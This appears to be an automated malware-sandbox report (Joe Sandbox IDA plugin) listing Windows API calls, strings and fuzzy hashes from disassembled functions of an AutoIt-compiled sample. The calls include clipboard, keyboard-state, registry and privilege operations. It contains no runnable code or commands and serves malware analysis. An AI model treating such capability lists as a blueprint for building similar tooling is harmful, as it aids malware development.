                                                                                                                                                                                                                      • Part of subcall function 00007FF656CB37B0: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF656CB3785), ref: 00007FF656CB3924
                                                                                                                                                                                                                    • SystemParametersInfoW.USER32 ref: 00007FF656CB3797
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme_invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4207566314-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 485612231-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 918212764-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Init_thread_footer
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1385522511-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClearVariant
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1473721057-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3947729631-0
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                    • Opcode ID: 818d4f054f78961d0311f8415a74e8c04cfe353b78e3df62868af38b1621707f
                                                                                                                                                                                                                    • Instruction ID: 377bb642f425f7ddf617c9cb037b23dce3cb667ccd591a82d4842c301ea5a96f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 818d4f054f78961d0311f8415a74e8c04cfe353b78e3df62868af38b1621707f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A0184A1E0820741FE26AA65951337922705F94774F2D5330E92DFB2D3CE2EEC01C311
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
• Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CE4970: _invalid_parameter_noinfo.LIBCMT ref: 00007FF656CE4999
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF656CFC8FE), ref: 00007FF656CB656F
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
• Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FreeLibrary_invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3938577545-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF656CD4C5C
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CD5600: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF656CD5609
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CD5600: _CxxThrowException.LIBVCRUNTIME ref: 00007FF656CD561A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
• Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Concurrency::cancel_current_taskExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1680350287-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
• Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
• Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LongNamePath
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 82841172-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
• Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: IconNotifyShell_
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1144537725-0
APIs
Memory Dump Source
• Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
• Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Open_onexit
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3030063568-0
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Process$CurrentVersionWow64_onexit
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2932345936-0
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _onexit
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 572287377-0
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _onexit
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 572287377-0
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1452528299-0
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AllocHeap
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4292702814-0
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                    • API String ID: 2211948467-2373415609
                                                                                                                                                                                                                    • Opcode ID: 8e2f89096802004413711948fd726798781e069153c0ca8acc30819db0585273
                                                                                                                                                                                                                    • Instruction ID: d9f001ac691ca9baf7b80a8597238a64a7fa391e6f246c510a5916fcb7d30e57
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e2f89096802004413711948fd726798781e069153c0ca8acc30819db0585273
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B922A076A08A428AEB10CF29E84456D77A0FB88BD8F584735DE4E97B64CF7ED445CB00
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$MessageSend$Menu$Item$EnableInfoMove$DefaultShow$DrawFocusLongRect
                                                                                                                                                                                                                    • String ID: P
                                                                                                                                                                                                                    • API String ID: 1208186926-3110715001
                                                                                                                                                                                                                    • Opcode ID: 0e3e078a853430a05022e0f772db04c3cd8d70c986a797c2cebe1c7d1304ed73
                                                                                                                                                                                                                    • Instruction ID: 76a5409a403c931967904dc4534a877fbdd0afc20006cc494299e745a330956c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e3e078a853430a05022e0f772db04c3cd8d70c986a797c2cebe1c7d1304ed73
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE121272A0868286E7248B25D454BBD37A0FB95794F584B35DE4EA3ED4CF3EE481CB00
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                    • String ID: A$AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                    • API String ID: 2910397461-2439800395
                                                                                                                                                                                                                    • Opcode ID: 6a4158767fd1e3aa62d6cad0ab6a36848a32ab8b88e438b2c1d2663541e17033
                                                                                                                                                                                                                    • Instruction ID: f6b3f1e913140ee97b84e7a7b63009120d095eeed3ae05ecf91604828ef32f28
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a4158767fd1e3aa62d6cad0ab6a36848a32ab8b88e438b2c1d2663541e17033
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71E18076A0868187E714CF25E84466A77A0FB89BD8F544735DA8EA3B64CFBDE444CB00
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                                                                                                                    • API String ID: 3778422247-2988720461
                                                                                                                                                                                                                    • Opcode ID: cd6974c24a3c73bdd9695786a971f02835d0cd3b561fa91e9f0f548f8bdf6fbe
                                                                                                                                                                                                                    • Instruction ID: a5c58799deec07dfd7e0d32b4d82a3bf0a3e208010d244b6ba92e08bf5a065eb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd6974c24a3c73bdd9695786a971f02835d0cd3b561fa91e9f0f548f8bdf6fbe
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53417525B0861283E7145B26E81473A3391BF88BD1F9D5B35C90AE7B54DE7F98CAC700
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Destroy$ImageList_Window$DeleteMessageObjectSend$IconMove
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3372153169-0
                                                                                                                                                                                                                    • Opcode ID: cebe50662675a261df0ce57bb688d6874ca0698041b92cdd573b2dd792630721
                                                                                                                                                                                                                    • Instruction ID: 2ca2e26549d432f5526424c601cbdd3e38a8246709a1860bdbe1092221d4fd62
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cebe50662675a261df0ce57bb688d6874ca0698041b92cdd573b2dd792630721
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B2290B2A0968285EF648B25D4542BD7771FF85B94F584632CA5EA7BA4DF3FE480C300
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Process$StationWindow$CloseCurrentHandleUser$CreateDuplicate$BlockDesktopEnvironmentHeapOpenProfileToken$AdjustAllocDestroyErrorLastLoadLogonLookupPrivilegePrivilegesThreadUnloadValuewcscpy
                                                                                                                                                                                                                    • String ID: default$winsta0$winsta0\default
                                                                                                                                                                                                                    • API String ID: 3202303201-1423368268
                                                                                                                                                                                                                    • Opcode ID: 091f1a57d75101d6ed2683881d223198c216f016178f125fe8986543f304195e
                                                                                                                                                                                                                    • Instruction ID: c2dd918c5f079ed64081f8bf64bb9f724d8ccd5fc22d107a28fbd809cf12174f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 091f1a57d75101d6ed2683881d223198c216f016178f125fe8986543f304195e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5A19232B08B4286EB10CF62E8402AA73A1FB85B94F484735DE5DA7B99CF7DE045C740
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                    • String ID: AutoIt v3 GUI
                                                                                                                                                                                                                    • API String ID: 1458621304-248962490
                                                                                                                                                                                                                    • Opcode ID: b8f5b06e3d0277f3ffc73035af6cc9ad4e685f54e981a48a8f38e285d267cba3
                                                                                                                                                                                                                    • Instruction ID: 47edaa7d6d132aa5b1e1eb4b68daf0b000135c0369d1043a33e480fb7e88e494
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8f5b06e3d0277f3ffc73035af6cc9ad4e685f54e981a48a8f38e285d267cba3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7D17E72A086428AEB14DF79D8547AC37B1FB84B98F544635DA0EA3BA8DF3DE444C740
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3222323430-0
                                                                                                                                                                                                                    • Opcode ID: 9b87d7956825108095e474127530b25728a3743fc17a6d5c8f31ecbd5b711407
                                                                                                                                                                                                                    • Instruction ID: 48d68aae0718d3efbb8474f2311010b4c65459da16f56585711d6f64a611afd4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b87d7956825108095e474127530b25728a3743fc17a6d5c8f31ecbd5b711407
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43718A71A08A4382EA10AB15D45427C3361FF84B85F888B35C94EE77A1DFBEEA46C750
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$Menu$InfoItemTextWindow$CharDrawInvalidateNextRect
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1015379403-0
                                                                                                                                                                                                                    • Opcode ID: 0a710b93e13d857b9144ac7b186b2f10a1b031a99a6f1028557fe67ef9fb3e4e
                                                                                                                                                                                                                    • Instruction ID: ea012a5c34c1a9c2d962c5511b5aaef0cfc9bacccea0ce13d66e329b4d609126
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a710b93e13d857b9144ac7b186b2f10a1b031a99a6f1028557fe67ef9fb3e4e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37020572A0A68685EB208F21D4046BD37A1FB94794F484B3ADA5EA7FD4CF3EE545C700
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3215588206-0
                                                                                                                                                                                                                    • Opcode ID: 486734a10a8987c1c87853d7cfea6df4eeb43b8f453fb3bc83844081bd685034
                                                                                                                                                                                                                    • Instruction ID: 801a04e03c42dcdd6a5e7041a907e728a6ea0c14d27b01624deb267d196d5968
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 486734a10a8987c1c87853d7cfea6df4eeb43b8f453fb3bc83844081bd685034
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C516D32B0CB028AEB548F64E45827D33A1EB49784F188A39DA5ED3B85DE7DE495C344
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseValue$ConnectCreateRegistry
                                                                                                                                                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                    • API String ID: 3314541760-966354055
                                                                                                                                                                                                                    • Opcode ID: 82d0b5bcfb78c93eebd4ae76fb201b0f7a87ba8ff10155f62f0470f0a30b5334
                                                                                                                                                                                                                    • Instruction ID: c7c0570411bd93a9e0af6853f80f643f3b1d84a10f9b588dcd71baf0e90cde5c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 82d0b5bcfb78c93eebd4ae76fb201b0f7a87ba8ff10155f62f0470f0a30b5334
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EA026366B08B8285EB10DF26D4902AD3770FB89F88B489632DE4DA7766DF3DE445C740
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: P
                                                                                                                                                                                                                    • API String ID: 0-3110715001
                                                                                                                                                                                                                    • Opcode ID: 89df1471032732431b81a05b11aefcbbc91b985f9c802d2c82d041fa720837f2
                                                                                                                                                                                                                    • Instruction ID: d74b61f288f4110c169f44c5a4421bb87511d94df82cad968f1dadab1eab2e1a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 89df1471032732431b81a05b11aefcbbc91b985f9c802d2c82d041fa720837f2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04A1A2B2A0864186F724CF25D4546BAB770FF84788F988235DB5EA3A94CF7EE549C700
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
                                                                                                                                                                                                                    • String ID: -$:$:$?
                                                                                                                                                                                                                    • API String ID: 3440502458-92861585
                                                                                                                                                                                                                    • Opcode ID: 2484a17d68417765dfea95e8ed30be907b8393143ee9075556b7ff4147a9153c
                                                                                                                                                                                                                    • Instruction ID: 63104b5b1ad85bce2737b4c3eed1d84d508d15297e830ee28bef1c2c0b313ae5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2484a17d68417765dfea95e8ed30be907b8393143ee9075556b7ff4147a9153c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 45E1D5B2A0828286E7249F7198516B9B7B0FB84794F4C5135EA4EE2B99DF3ED441C700
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Time$File$FindLocalSystem$CloseFirst
                                                                                                                                                                                                                    • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                                                                    • API String ID: 3232708057-3289030164
                                                                                                                                                                                                                    • Opcode ID: 5c779f221d7aeb540d444412295e12a250afa50e4e6d56f81e5e2491da9cccd3
                                                                                                                                                                                                                    • Instruction ID: ae5eabf5949cc4243996d0cfdf98bb0d78bc3b0f43800260febf248c72f3b05b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c779f221d7aeb540d444412295e12a250afa50e4e6d56f81e5e2491da9cccd3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DD1B4A2B18A5281EB10DB65E4410FE7771FB84794F844232EE4EE7AA9DF7ED108C740
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                                                                    • API String ID: 1409584000-438819550
                                                                                                                                                                                                                    • Opcode ID: 8f313655dcbdbe42a35da08493f07892190d387efc47daab254f64e3a089ff94
                                                                                                                                                                                                                    • Instruction ID: cd5c62e45838e375587c0b1e997e6c743cdf39d0456370cdcc2e0b600352bd19
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f313655dcbdbe42a35da08493f07892190d387efc47daab254f64e3a089ff94
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DD418425B0864254EB00DB55E8482B973A1FB48BE4F8C5B31DD6EA76E4DF7EE44AC300
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: SendString
                                                                                                                                                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                    • API String ID: 890592661-1007645807
                                                                                                                                                                                                                    • Opcode ID: 6e164f36fc51d55b22e1026945b1aa4b641673a9c64d89865777c7d9524d423d
                                                                                                                                                                                                                    • Instruction ID: 1602f2a02b0eee5dd5f98074fca3fc5c3c67f78786fe5338e0133e9e48673220
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e164f36fc51d55b22e1026945b1aa4b641673a9c64d89865777c7d9524d423d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5121B422B0865291EB20DB24F854A7A7330FFD5748FD84731EA4DA39A8DE3ED505C740
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 541375521-0
                                                                                                                                                                                                                    • Opcode ID: 3846c89bd659206fb3b2d3285dc51d557998776e104b8ac6e0153ffc668b7184
                                                                                                                                                                                                                    • Instruction ID: b0bd21d5ce9e013d783b11c661581e80a30f89f9fb35f8d522529da6d6aad33b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3846c89bd659206fb3b2d3285dc51d557998776e104b8ac6e0153ffc668b7184
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 15710D62A0C2C245FBB48B30D8102BA3B61EF45B84F5D0B79D68DA7392CE5FD949C721
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                                                                    • API String ID: 2640511053-438819550
                                                                                                                                                                                                                    • Opcode ID: d607f8cd377dc7cb12783564cfab50aac2a1e28959c9b0777418728c286e0dff
                                                                                                                                                                                                                    • Instruction ID: b61f8cf8118fc18b73fad2ae3b637ad7c4a959ccd1bc4f3eb4e87c6d4843bc07
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d607f8cd377dc7cb12783564cfab50aac2a1e28959c9b0777418728c286e0dff
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E241D121B0CA4250EA009B15E8446B963A0FF45BE4F8C5B31DD6EA76E5EF7EE44AC740
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: QueryValue$Close$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3218304859-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2762341140-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1255039815-0
